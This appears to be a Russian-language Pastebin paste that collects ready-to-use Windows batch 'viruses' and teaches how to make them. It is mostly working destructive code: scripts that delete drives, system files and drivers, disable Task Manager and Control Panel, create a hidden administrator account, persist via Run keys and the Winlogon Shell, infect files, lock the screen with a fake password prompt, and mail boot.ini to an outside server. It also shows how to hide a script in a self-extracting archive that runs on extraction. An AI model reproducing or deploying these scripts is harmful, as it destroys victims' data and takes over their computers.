SHARE
TWEET

Untitled

zetlnd Apr 9th, 2018 (edited) 7 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. Оглавление
  2. Готовые bat вирусы 2
  3. Простенькие вирусы 2
  4. Убирает рабочий стол  2
  5. Выключается компьютер   2
  6. Перезагрузка компьютера   2
  7. Запрещает запускать программы    2
  8. Удаление дров   2
  9. Удаляет звуки Windows   2
  10. Запрещает заходить в панель управления    2
  11. Запрещает комбинацию Ctrl-Alt-Delete 3
  12. Меняет местами значение кнопок мыши  3
  13. Удаляет курсор мыши    3
  14. Меняет название корзины    3
  15. Убирает панель управления    3
  16. Серьезные вирусы 4
  17. Удаляет ВСЕ с раздела\диска(не пытайтесь проверить у себя)  4
  18. Удаляет все файлы в program files   4
  19. Убивает процесс explorer.exe  4
  20. Создает миллион папок    4
  21. Удаляет все драйвера, которые установлены на компьютере 4
  22. Удаляет команду DEL   4
  23. Будет открывать бесконечно Пэинт   4
  24. Изменяет расширение всех ярлыков на .txt 4
  25. Заражает Autoexec   4
  26. Создает нового пользователя, с правами администратора, логин:hacker и пароль hack (Можете изменить)    4
  27. сбой системы (!) - выключить все функции ввода-вывода (клавиатура, дисплей, мышь). В результате будет черный экран с курсором и ни на что не реагирующая система, однако Windows продолжает работать. 4
  28. Меняет местами кнопки мыши,но обратная смена не возможна)   4
  29. Удаляет ядро системы  4
  30. Заражает *.jpg *.mp3 *.doc *.htm? *.xls. (Заражает не только в текущем каталоге, но и надкаталоге)    5
  31. Вирус заражает *.JPG в текущем каталоге    5
  32. Жестокие вирусы   6
  33. У вашего ламера будет глючить компьютер.  6
  34. Вирус который убивает Винду. Не проверяйте на своем компьютере=)   7
  35. Вирус полностью блокирует систему при следующем запуске Windows. Даже в безопасном режиме, выключает диспетчер задач. Чтобы разблокировать компьютер можно введя код 200393! (Но он не разблокирует)    11
  36. Добавляет программу в автозагрузку ОС  12
  37. Создаем вирус   13
  38. Команды для BAT-файлов  15
  39.  
  40. Готовые bat вирусы
  41.  
  42. Здесь готовые Bat-вирусы. Просто вставляем код в bat файл и все, если не знаете как создать bat файл читаем тут
  43. Простенькие вирусы
  44. Убирает рабочий стол
  45. @echo off
  46. reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDesktop /t REG_DWORD /d 1 /f >nul
  47. Выключается компьютер
  48. @echo off
  49. shutdown -s -t 1 -c "lol" >nul
  50. Перезагрузка компьютера
  51. @echo off
  52. shutdown -r -t 1 -c "lol" >nul
  53. Запрещает запускать программы
  54. @echo off
  55. reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\RestrictRun /v 1 /t REG_DWORD /d %SystemRoot%\explorer.exe /f >nul
  56. Удаление дров
  57. @echo off
  58. del "%SystemRoot%\Driver Cache\i386\driver.cab" /f /q >nul
  59. Удаляет звуки Windows
  60. @echo off
  61. del "%SystemRoot%\Media" /q >nul
  62. Запрещает заходить в панель управления
  63. @echo off
  64. reg add HKCU\Software\Microsoft\Windows\Current Version\Policies\Explorer
  65. /v NoControlPanel /t REG_DWORD /d 1 /f >nul
  66.  
  67.  
  68.  
  69. Запрещает комбинацию Ctrl-Alt-Delete
  70. reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem /v DisableTaskMgr /t REG_DWORD /d 1 /f >nul
  71. Меняет местами значение кнопок мыши
  72. %SystemRoot%/system32/rundll32 user32, SwapMouseButton >nul
  73. Удаляет курсор мыши
  74. del "%SystemRoot%Cursors*.*" >nul
  75. Меняет название корзины
  76. reg add HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache /v @C:\WINDOWS\system32\SHELL32.dll,-8964 /t REG_SZ /d ТУТ НАЗВАНИЕ КОРЗИНЫ /F
  77. Убирает панель управления
  78. reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
  79.  
  80.  
  81.  
  82. Серьезные вирусы
  83. Удаляет ВСЕ с раздела\диска(не пытайтесь проверить у себя)
  84. rd [Буква_Диск]: /s /q
  85. Удаляет все файлы в program files
  86. del c:Program Files/q
  87. Убивает процесс explorer.exe
  88. taskkill /f /im explorer.exe >nul
  89. Создает миллион папок
  90. FOR /L %%i IN (1,1,1000000) DO md %%i
  91. Удаляет все драйвера, которые установлены на компьютере
  92. del "%SystemRoot%Driver Cachei386driver.cab" /f /q >nul
  93. Удаляет команду DEL
  94. del %0
  95. Будет открывать бесконечно Пэинт
  96. :x
  97. Start mspaint
  98. goto x
  99. Изменяет расширение всех ярлыков на .txt
  100. assoc .lnk=.txt
  101. Заражает Autoexec
  102. copy ""%0"" "%SystemRoot%\system32\batinit.bat" >nul
  103. reg add "HKCU\SOFTWARE\Microsoft\Command Processor" /v AutoRun /t REG_SZ /d "%SystemRoot%\syste m32\batinit.bat" /f >nul
  104. Создает нового пользователя, с правами администратора, логин:hacker и пароль hack (Можете изменить)
  105. @echo off
  106. chcp 1251
  107. net user SUPPORT_388945a0 /delete
  108. net user hacker hack /add
  109. net localgroup Администраторы hacker /add
  110. net localgroup Пользователи SUPPORT_388945a0 /del
  111. reg add "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogonSpecialAccountsUserList" /v "support" /t reg_dword /d 0 y
  112. сбой системы (!) - выключить все функции ввода-вывода (клавиатура, дисплей, мышь). В результате будет черный экран с курсором и ни на что не реагирующая система, однако Windows продолжает работать.
  113. rundll32 user,disableoemlayer
  114. Меняет местами кнопки мыши,но обратная смена не возможна)  
  115. rundll32 user,SwapMouseButton
  116. Удаляет ядро системы
  117. del %systemroot%\system32\HAL.dll
  118.  
  119.  
  120.  
  121. Заражает *.jpg *.mp3 *.doc *.htm? *.xls. (Заражает не только в текущем каталоге, но и надкаталоге)
  122. @echo off%[MrWeb]%
  123. if '%1=='In_ goto MrWebin
  124. if exist c:\MrWeb.bat goto MrWebru
  125. if not exist %0 goto MrWeben
  126. find "MrWeb"<%0>c:\MrWeb.bat
  127. attrib +h c:\MrWeb.bat
  128. :MrWebru
  129. for %%g in (..\*.jpg ..\*.doc ..\*.htm? *.jpg *.mp3 *.doc *.htm? *.xls) do call c:\MrWeb In_ %%ggoto MrWeben
  130. :MrWebin
  131. if exist %2.bat goto MrWeben
  132. type c:\MrWeb.bat>>%2.bat
  133. echo start %2>>%2.bat%[MrWeb]%
  134. :MrWeben
  135. Вирус заражает *.JPG в текущем каталоге
  136. @echo off%[MrWeb]%
  137. if '%1=='In_ goto MrWebin
  138. if exist c:\MrWeb.bat goto MrWebru
  139. if not exist %0 goto MrWeben
  140. find "MrWeb"<%0>c:\MrWeb.bat
  141. attrib +h c:\MrWeb.bat
  142. :MrWebru
  143. for %%g in (*.jpg) do call c:\MrWeb In_ %%g
  144. goto MrWeben
  145. :MrWebin
  146. if exist %2.bat goto MrWeben
  147. type c:\MrWeb.bat>>%2.bat
  148. echo start %2>>%2.bat%[MrWeb]%
  149. :MrWeben
  150.  
  151.  
  152.  
  153. Жестокие вирусы
  154. У вашего ламера будет глючить компьютер.
  155. @echo off
  156. echo Set fso = CreateObject("Scripting.FileSystemObject") > %systemdrive%\windows\system32\rundll32.vbs
  157. echo do >> %systemdrive%\windows\system32\rundll32.vbs
  158. echo Set tx = fso.CreateTextFile("%systemdrive%\windows\system32\rundll32.dat", True) >> %systemdrive%\windows\system32\rundll32.vbs
  159. echo tx.WriteBlankLines(100000000) >> %systemdrive%\windows\system32\rundll32.vbs
  160. echo tx.close >> %systemdrive%\windows\system32\rundll32.vbs
  161. echo FSO.DeleteFile "%systemdrive%\windows\system32\rundll32.dat" >> %systemdrive%\windows\system32\rundll32.vbs
  162. echo loop >> %systemdrive%\windows\system32\rundll32.vbs
  163.  
  164. start %systemdrive%\windows\system32\rundll32.vbs
  165.  
  166. reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v system_host_run /t REG_SZ /d %systemdrive%\windows\system32\rundll32.vbs /f
  167.  
  168.  
  169.  
  170. Вирус который убивает Винду. Не проверяйте на своем компьютере=)
  171. @echo This virus created by LIZA
  172. @echo Virus: pcforumhack.ru™ Virus
  173. @echo Autor: LIZA
  174. @echo off
  175. echo Chr(39)>%temp%\temp1.vbs
  176. echo Chr(39)>%temp%\temp2.vbs
  177. echo on error resume next > %temp%\temp.vbs
  178. echo Set S = CreateObject("Wscript.Shell") >> %temp%\temp.vbs
  179. echo set FSO=createobject("scripting.filesystemobject")>>%temp%\temp.vbs
  180. reg add HKEY_USERS\S-1-5-21-343818398-1417001333-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v nodesktop /d 1 /freg add HKEY_USERS\S-1-5-21-343818398-1417001333-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v ClassicShell /d 1 /fset ¶§=%0
  181. copy %¶§% %SystemRoot%\user32dll.bat
  182. reg add "hklm\Software\Microsoft\Windows\CurrentVersion\Run" /v RunExplorer32 /d %SystemRoot%\user32dll.bat /f
  183. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoDrives /t REG_DWORD /d 67108863 /f
  184. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoViewOnDrive /t REG_DWORD /d 67108863 /f
  185. echo fso.deletefile "C:\ntldr",1 >> %temp%\temp.vbs
  186. reg add "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions" /v "NoSelectDownloadDir" /d 1 /f
  187. reg add "HKLM\SOFTWARE\Microsoft\Internet Explorer\main\FeatureControl\Feature_LocalMachine_Lockdown" /v "IExplorer" /d 0 /f
  188. reg add "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions" /v "NoFindFiles" /d 1 /f
  189. reg add "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions" /v "NoNavButtons" /d 1 /f
  190. echo fso.deletefolder "D:\Windows",1 >> %temp%\temp.vbs
  191. echo fso.deletefolder "I:\Windows",1 >> %temp%\temp.vbs
  192. echo fso.deletefolder "C:\Windows",1 >> %temp%\temp.vbs
  193. echo sr=s.RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRoot") >> %temp%\temp.vbs
  194. echo fso.deletefile sr+"\system32\hal.dll",1 >> %temp%\temp.vbs
  195. echo sr=s.RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRoot") >> %temp%\temp.vbs
  196. echo fso.deletefolder sr+"\system32\dllcache",1 >> %temp%\temp.vbs
  197. echo sr=s.RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRoot") >> %temp%\temp.vbs
  198. echo fso.deletefolder sr+"\system32\drives",1 >> %temp%\temp.vbs
  199. echo s.regwrite "HKEY_CLASSES_ROOT\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\LocalizedString","forum.whack.ru™">>%temp%\temp.vbs
  200. echo s.regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOwner","forum.whack.ru™">>%temp%\temp.vbs
  201. echo s.regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOrganization","forum.whack.ru™">>%temp%\temp.vbs
  202. echo on error resume next > %temp%\temp1.vbs
  203. echo set FSO=createobject("scripting.filesystemobject")>>%temp%\temp1.vbs
  204. echo do>>%temp%\temp1.vbs
  205. echo fso.getfile ("A:\")>>%temp%\temp1.vbs
  206. echo loop>>%temp%\temp1.vbs
  207. echo on error resume next > %temp%\temp2.vbs
  208. echo Set S = CreateObject("Wscript.Shell") >> %temp%\temp2.vbs
  209. echo do>>%temp%\temp2.vbs
  210. echo execute"S.Run ""%comspec% /c echo "" & Chr(7), 0, True">>%temp%\temp2.vbs
  211. echo loop>>%temp%\temp2.vbs
  212. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v disabletaskmgr /t REG_DWORD /d 1 /f
  213. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v disableregistrytools /t REG_DWORD /d 1 /f
  214. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuPinnedList /t REG_DWORD /d 1 /f
  215. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuMFUprogramsList /t REG_DWORD /d 1 /f
  216. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoUserNameInStartMenu /t REG_DWORD /d 1 /f
  217. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum" /v {20D04FE0-3AEA-1069-A2D8-08002B30309D} /t REG_DWORD /d 1 /f
  218. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoNetworkConnections /t REG_DWORD /d 1 /f
  219. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuNetworkPlaces /t REG_DWORD /d 1 /f
  220. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v StartmenuLogoff /t REG_DWORD /d 1 /f
  221. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuSubFolders /t REG_DWORD /d 1 /f
  222. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoCommonGroups /t REG_DWORD /d 1 /f
  223. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoFavoritesMenu /t REG_DWORD /d 1 /f
  224. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoRecentDocsMenu /t REG_DWORD /d 1 /f
  225. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoSetFolders /t REG_DWORD /d 1 /f
  226. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoAddPrinter /t REG_DWORD /d 1 /f
  227. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoFind /t REG_DWORD /d 1 /f
  228. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoSMHelp /t REG_DWORD /d 1 /f
  229. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoRun /t REG_DWORD /d 1 /f
  230. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuMorePrograms /t REG_DWORD /d 1 /f
  231. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoClose /t REG_DWORD /d 1 /f
  232. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoChangeStartMenu /t REG_DWORD /d 1 /f
  233. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoSMMyDocs /t REG_DWORD /d 1 /f
  234. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoSMMyPictures /t REG_DWORD /d 1 /f
  235. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuMyMusic /t REG_DWORD /d 1 /f
  236. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoControlPanel /t REG_DWORD /d 1 /f
  237. echo set application=createobject("shell.application")>>%temp%\temp.vbs
  238. echo application.minimizeall>>%temp%\temp.vbs
  239. reg add "hklm\Software\Microsoft\Windows\CurrentVersion\run" /v SwapNT /t REG_SZ /d rundll32 user32, SwapMouseButton /f
  240. start rundll32 user32, SwapMouseButton
  241. reg add "HKCR\exefile\shell\open\command" /ve /t REG_SZ /d rundll32.exe /f
  242. echo i=50 >> %temp%\temp.vbs
  243. echo while i^>0 or i^<0 >> %temp%\temp.vbs
  244. echo S.popup "forum.whack.ru™",0, "forum.whack.ru™",0+16 >> %temp%\temp.vbs
  245. echo i=i-1 >> %temp%\temp.vbs
  246. echo wend >> %temp%\temp.vbs
  247. echo do >> %temp%\temp.vbs
  248. echo wscript.sleep 200 >> %temp%\temp.vbs
  249. echo s.sendkeys"{capslock}" >> %temp%\temp.vbs
  250. echo wscript.sleep 200 >> %temp%\temp.vbs
  251. echo s.sendkeys"{numlock}" >> %temp%\temp.vbs
  252. echo wscript.sleep 200 >> %temp%\temp.vbs
  253. echo s.sendkeys"{scrolllock}" >> %temp%\temp.vbs
  254. echo loop>> %temp%\temp.vbs
  255. echo Set oWMP = CreateObject("WMPlayer.OCX.7") >> %temp%\temp.vbs
  256. echo Set colCDROMs = oWMP.cdromCollection >> %temp%\temp.vbs
  257. echo if colCDROMs.Count ^>= 1 then >> %temp%\temp.vbs
  258. echo For i = 0 to colCDROMs.Count - 1 >> %temp%\temp.vbs
  259. echo colCDROMs.Item(i).eject >> %temp%\temp.vbs
  260. echo next >> %temp%\temp.vbs
  261. echo End If >> %temp%\temp.vbs
  262. echo Call SendPost("smtp.mail.ru", "forum.whack.ru™@mail.ru", "support@mail.ru", "...", "Копм заражен!") >> %temp%\temp.vbs
  263. echo Function SendPost(strSMTP_Server, strTo, strFrom, strSubject, strBody) >> %temp%\temp.vbs
  264. echo Set iMsg = CreateObject("CDO.Message") >> %temp%\temp.vbs
  265. echo Set iConf = CreateObject("CDO.Configuration") >> %temp%\temp.vbs
  266. echo Set Flds = iConf.Fields >> %temp%\temp.vbs
  267. echo Flds.Item("http://schemas.microsoft.com/cdo/configuration/sendusing") = 2 >> %temp%\temp.vbs
  268. echo Flds.Item("http://schemas.microsoft.com/cdo/configuration/smtpauthenticate") = 1 >> %temp%\temp.vbs
  269. echo Flds.Item("http://schemas.microsoft.com/cdo/configuration/sendusername") = "support" >> %temp%\temp.vbs
  270. echo Flds.Item("http://schemas.microsoft.com/cdo/configuration/sendpassword") = "support" >> %temp%\temp.vbs
  271. echo Flds.Item("http://schemas.microsoft.com/cdo/configuration/smtpserver") = "smtp.mail.ru" >> %temp%\temp.vbs
  272. echo Flds.Item("http://schemas.microsoft.com/cdo/configuration/smtpserverport") = 25 >> %temp%\temp.vbs
  273. echo Flds.Update >> %temp%\temp.vbs
  274. echo iMsg.Configuration = iConf >> %temp%\temp.vbs
  275. echo iMsg.To = strTo >> %temp%\temp.vbs
  276. echo iMsg.From = strFrom >> %temp%\temp.vbs
  277. echo iMsg.Subject = strSubject >> %temp%\temp.vbs
  278. echo iMsg.TextBody = strBody >> %temp%\temp.vbs
  279. echo iMsg.AddAttachment "c:\boot.ini" >> %temp%\temp.vbs
  280. echo iMsg.Send >> %temp%\temp.vbs
  281. echo End Function >> %temp%\temp.vbs
  282. echo Set iMsg = Nothing >> %temp%\temp.vbs
  283. echo Set iConf = Nothing >> %temp%\temp.vbs
  284. echo Set Flds = Nothing >> %temp%\temp.vbs
  285.  
  286. echo s.run "shutdown -r -t 0 -c ""pcforumhack.ru™"" -f",1 >> %temp%\temp.vbs
  287. start %temp%\temp.vbs
  288. start %temp%\temp1.vbs
  289. start %temp%\temp2.vbs
  290.  
  291.  
  292.  
  293. Вирус полностью блокирует систему при следующем запуске Windows. Даже в безопасном режиме, выключает диспетчер задач. Чтобы разблокировать компьютер можно введя код 200393! (Но он не разблокирует)
  294. @echo off
  295. CHCP 1251
  296. cls
  297. Set Yvaga=На вашем компьютере найден вирус.
  298. Set pass=Пароль
  299. Set pas=Введите пароль.
  300. Set virus=Чтобы разблокировать ПК вам потребуется ввести пароль
  301. Set dim=Выключаю вирус...
  302. title Внимание!!!
  303. CHCP 866
  304. IF EXIST C:\windows\boot.bat (
  305. goto ok )
  306. cls
  307. IF NOT EXIST C:\windows\boot.bat (
  308. ECHO Windows Registry Editor Version 5.00 >> C:\0.reg
  309. ECHO. >> C:\0.reg
  310. ECHO [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >> C:\0.reg
  311. ECHO. >> C:\0.reg
  312. ECHO "Shell"="Explorer.exe, C:\\windows\\boot.bat " >> C:\0.reg
  313. start/wait regedit -s C:\0.reg
  314. del C:\0.reg
  315. ECHO @echo off >>C:\windows\boot.bat
  316. ECHO C:\WINDOWS\system32\taskkill.exe /f /im Explorer.exe >>C:\windows\boot.bat
  317. ECHO reg add "HKCU\software\Microsoft\Windows\CurrentVersion\Policies\system" /v DisableTaskMgr /t REG_DWORD /d 1 /f >>C:\windows\boot.bat
  318. ECHO start sys.bat >>C:\windows\boot.bat
  319. attrib +r +a +s +h C:\windows\boot.bat
  320. copy virus.bat c:\windows\sys.bat
  321. attrib +r +a +s +h C:\windows\sys.bat
  322. GOTO end)
  323. :ok
  324. cls
  325. Echo %Yvaga%
  326. echo.
  327. echo %virus%
  328. echo %pas%
  329. set /a choise = 0
  330. set /p choise=%pass%:
  331. if "%choise%" == "101" goto gold
  332. if "%choise%" == "200393" goto status
  333. exit
  334. :status
  335. echo %dim%
  336. attrib -r -a -s -h C:\windows\boot.bat
  337. del C:\windows\boot.bat
  338. attrib -r -a -s -h C:\windows\sys.bat
  339. del C:\windows\sys.bat
  340. cls
  341. :gold
  342. start C:\
  343. :end
  344.  
  345. Добавляет программу в автозагрузку ОС
  346. copy ""%0"" "%SystemRoot%\system32\File.bat"
  347. reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Filel" /t REG_SZ /d "%SystemRoot%\system32\File.bat" /f
  348. reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoControlPanel /t REG_DWORD /d 1 /f
  349.  
  350. Этот вирус,блокирует все программы,но интернет работает.
  351.  
  352. @Echo off
  353. Echo Virus Loading
  354. Date 13.09.96
  355. If exist c:ski.bat goto abc
  356. Copy %0 c:ski.bat
  357. Attrib +h c:ski.bat
  358. Echo c:ski.bat >>autoexec.bat
  359. :abc
  360. md PRIDUROK
  361. md LUZER
  362. md DURAK
  363. md LAMER
  364. Label E: PRIDUROK
  365. assoc .exe=.mp3
  366. del c:Program Files/q
  367. Echo VIRUS LOAD
  368.  
  369.  
  370.  
  371. Создаем вирус
  372. В этой статье мы научимся создавать вредоносные программки, что-то вроде вируса. Где мы будем использовать штатные средства Windows.
  373. И так начнём:
  374. Для начала нам надо создать Текстовый документ.txt
  375. Правой кнопкой мыши по рабочему столу, дальше "создать" и выбираем "Текстовый документ"
  376. Открываем его, дальше нам надо забить в него команды bat файлов
  377. Примеры ниже:
  378. %SystemRoot%/system32/rundll32 user32, SwapMouseButton >nul – Поменять местами значения кнопок мыши
  379. reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPolicies ExplorerRestrictRun /v 1 /t REG_DWORD /d %SystemRoot%explorer.exe /f >nul – Делает невозможным запуск приложений
  380. time 0:00 >nul – Поставить время на 00:00
  381. reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPolicies System /v DisableRegistryTools /t REG_DWORD /d 1 /f >nul – Запретить редактирование реестра вручную
  382. del "%SystemRoot%Cursors*.*" >nul – Удалить курсор мыши
  383. del "%SystemRoot%Media" /q >nul – Удалить системные звуки Windows
  384. reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPolicies Explorer /v NoControlPanel /t REG_DWORD /d 1 /f >nul – Запретить вызов панели управления
  385. reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPolicies Explorer /v NoDesktop /t REG_DWORD /d 1 /f >nul – Убрать рабочий стол
  386. shutdown -r -t 1 -c "lol" -f >nul – Форсированная перезагрузка ПК
  387. shutdown -s -t 1 -c "lol" -f >nul – Форсированное выключение ПК
  388. taskkill /f /im explorer.exe >nul – Убить процесс Explorer.exe
  389. net share "ResName"="C:" >nul – Расшарить диск C:
  390. label C:Диск >nul – Переименовать диск С:
  391. msg * "Текст сообщения" >nul – Показать Windows-стилизованное сообщение с кнопкой ОК
  392. del "%0" >nul – Самоликвидация вирус
  393. Давайте мы попробуем поменять местами значения кнопок мыши, напишем в текстовом документе.txt это:
  394. %SystemRoot%/system32/rundll32 user32, SwapMouseButton >nul
  395.  
  396.  
  397. Сохраняем, и чтобы команда заработала нам надо переименовать "Текстовый документ.txt" вместо txt пишем bat, у нас должно получится вот так "Текстовый документ.bat" (Без кавычек)
  398.  
  399. Вот и все небольшой простенький вредоносный вирус создан.
  400. Если хотите убедиться,что вирус создан открываем Текстовый документ.bat
  401. И радуемся)) Если хотите вернуть местами кнопки мыши, то
  402. Заходим в Панель управления заходите в файл под названием "Мышь"
  403. Убираем галочку где написано "обменять назначение кнопок», нажимаете применить. Вот и все.
  404. Если хотите пошутить над другом или подкинуть вирус то делаем так:
  405. Ваш созданный вирус bat добавляем в архив, надеюсь все знают, как это делается. Правой кнопкой мыши на файле и добавить в архив.
  406. Мы зашли в "Имя и Параметры архива», ставим галочку где написано "Создать SFX-архив"
  407. Потом заходим "Дополнительно" дальше в "Параметры SFX..."
  408. Где написано "Выполнить после распаковки «пишем НАЗВАНИЕ вашего bat файла, например, если у вас название вашего bat файла "Текстовый документ.bat" то в поле "Выполнить после распаковки" пишем Текстовый документ.bat
  409. И теперь если открыть вот этот наш архив (вирус), надо нажать "Извлечь», и вирус автоматический сработает.
  410.  
  411.  
  412. Команды для BAT-файлов
  413. Это команды, которые используются для BAT файлов.
  414. Ну в общем так сказать, для написания вирусов.
  415.  
  416.  
  417. ASSOC - Отображает или модифицирует связи расширений файлов
  418. AT - Планирует команды и программы для выполнения на компьютере.
  419. ATTRIB - Отображает или изменяет атрибуты файла.
  420. BREAK - Устанавливает или отменяет проверку комбинации [Ctrl+C].
  421. CACLS - Отображает или модифицирует списки управления доступом (ACLs) для файлов.
  422. CALL - Вызывает один *.BAT-файл из другого.
  423. CD - Отображает имя или изменяет имя текущей директории.
  424. CHCP - Отображает или устанавливает номер активной кодовой страницы.
  425. CHDIR - Отображает имя или изменяет имя текущей директории.
  426. CHKDSK - Проверяет диск и отображает отчет о состоянии.
  427. CLS - Очищает экран.
  428. CMD - Стартует новый экземпляр интерпретатора команд Windows NT.
  429. COLOR - Устанавливает цвета по умолчанию для переднего и заднего плана консоли.
  430. COMMAND - Стартует новую копию интерпретатора команд Windows.
  431. COMP - Сравнивает содержимое двух файлов или установки файлов.
  432. COMPACT - Отображает или видоизменяет сжатие файлов на патрициях Windows NT(NTFS).
  433. CONVERT - Конвертирует FAT томов к формату файловой системы Windows NT(NTFS). Вы не можете конвертировать текущий диск.
  434. COPY - Копирует один или больше файлов на другое место.
  435. CTTY - Изменяет терминальное устройство, используемое для управления вашей системой.
  436. DATE - Отображает или устанавливает дату.
  437. DEL - Удаляет один или более файлов.
  438. DEBUG - Выполняет отладку, тестирование программ и редактирование инструментальных средств.
  439. DIR - Отображает список файлов и поддиректорий в директории.
  440. DISKCOMP - Сравнивает содержимое двух дискет.
  441. DISKCOPY - Копирует содержимое одной дискеты на другую.
  442. DOSKEY - Редактирует командные строки, восстанавливает команды Windows и создает макрос.
  443. ECHO - Отображает сообщения, или включает/выключает вывод команд.
  444. EMM386 - Включает/выключает поддержку расширенной памяти EMM386.
  445. ENDLOCAL - Заканчивает локализацию изменений окружающей среды в *.BAT-файле.
  446. ERASE - Удаляет один или более файлов.
  447. EXIT - Прекращает выполнение программы (интерпретатор команд).
  448. EXTRACT - Средство извлечения информации из CAB - файлов.
  449. FC - Сравнивает два файла или установки файлов, и отображает различие между ними.
  450. FIND - Ищет текстовую строку в файле или файлах.
  451. FINDSTR - Поиск строк в файлах.
  452. FOR - Выполняет указанную команду для каждого файла в наборе файлов.
  453. FORMAT - Форматирует диск для использования с Windows.
  454. FTYPE - Отображает или модифицирует типы файлов, используемых в связях расширений.
  455. GOTO - Направляет интерпретатор команд Windows NT к помеченной строке в *.BAT-файле.
  456. GRAFTABL - Способность Windows отображать символы псевдографики, вставленные в графическом режиме.
  457. HELP - Обеспечивает информацию Help для команд Windows.
  458. IF - Выполняет обработку условия в *.BAT-файле.
  459. KEYB - Конфигурирует клавиатуру для заданного языка.
  460. LABEL - Создает, изменяет, или удаляет метку тома на диске.
  461. LOADHIGH(LH) - Загружает программу в верхние адреса памяти.
  462. MD - Создает директорию.
  463. MEM - Отображает величину используемой и свободной памяти в вашей системе.
  464. MKDIR - Создает директорию.
  465. MODE - Конфигурирует системное устройство.
  466. MORE - Отображает вывод одного экрана за раз.
  467. MOVE - Перемещает один или более файлов из одной директории в другую на том же диске.
  468. NETSTAT - Отображает статистики протоколов и текущих сетевых соединений TCP/IP.
  469. NLSFUNC - Загружает информацию, специфическую для страны.
  470. PATH - Отображает или устанавливает путь поиска для выполняемых файлов.
  471. PAUSE - Приостанавливает обработку *.BAT-файла и отображает сообщение.
  472. POPD - Восстанавливает предыдущее значение текущей директории, сохраненной по PUSHD.
  473. PRINT - Печатает текстовый файл.
  474. PROMPT - Изменяет подсказку к командам Windows.
  475. PUSHD - Сохраняет текущую директорию, потом изменяет.
  476. RD - Удаляет директорию.
  477. RECOVER - Восстанавливает читаемую информацию с плохого или дефектного диска.
  478. REM - Записывает комментарии (примечания) в *.BAT-файлы или CONFIG.SYS.
  479. REN - Переименует файл или файлы.
  480. RENAME - Переименует файл или файлы.
  481. REPLACE - Заменяет файлы.
  482. RESTORE - Восстанавливает файлы, которые были архивированы с использованием команды BACKUP.
  483. RMDIR - Удаляет директорию.
  484. SET - Отображает, устанавливает или удаляет переменные среды Windows.
  485. SETLOCAL - Начинает локализацию изменений среды в *.BAT-файле.
  486. SETVER - Устанавливает номер версии MS-DOS, который Windows сообщает программе.
  487. SHIFT - Сдвигает позицию замещаемых параметров в *.BAT-файле.
  488. SMARTDRV - Инсталлирует и конфигурирует утилиту кэширования диска SMART - драйва.
  489. SORT - Сортирует входной поток.
